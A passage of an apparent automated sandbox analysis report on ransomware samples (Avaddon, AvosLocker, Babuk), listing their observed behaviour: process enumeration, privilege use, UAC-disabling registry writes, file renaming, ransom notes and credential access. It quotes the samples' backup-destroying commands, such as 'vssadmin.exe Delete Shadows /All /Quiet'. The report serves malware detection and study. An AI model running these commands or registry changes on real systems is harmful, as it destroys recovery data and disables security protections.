1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2716 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2716 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2716 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2716 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2716 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2716 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2716 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2716 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2716 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2716 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2716 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2716 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2208 wrote to memory of 1192 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2208 wrote to memory of 1192 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2208 wrote to memory of 1192 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2208 wrote to memory of 1192 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe"

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Downloads\807042-readme.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2208 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.myip.com udp
US 104.26.9.59:443 api.myip.com tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 2.18.190.81:80 apps.identrust.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
GB 184.25.193.61:80 x2.c.lencr.org tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.18.190.71:80 crl.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Cab3767.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar37F7.tmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\807042-readme.html

C:\Users\Admin\Documents\RestoreStop.xlsx

Analysis: behavioral4

Detonation Overview

Submitted 2024-07-28 16:38
Reported 2024-07-28 16:42
Platform win10v2004-20240704-en
Max time kernel 148s
Max time network 160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Renames multiple (60) files with added filename extension

ransomware

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\GET_YOUR_FILES_BACK.txt

Analysis: behavioral6

Detonation Overview

Submitted 2024-07-28 16:38
Reported 2024-07-28 16:42
Platform win10v2004-20240709-en
Max time kernel 108s
Max time network 148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe"

Signatures

Babuk Locker

ransomware babuk

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (1641) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\How To Restore Your Files.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
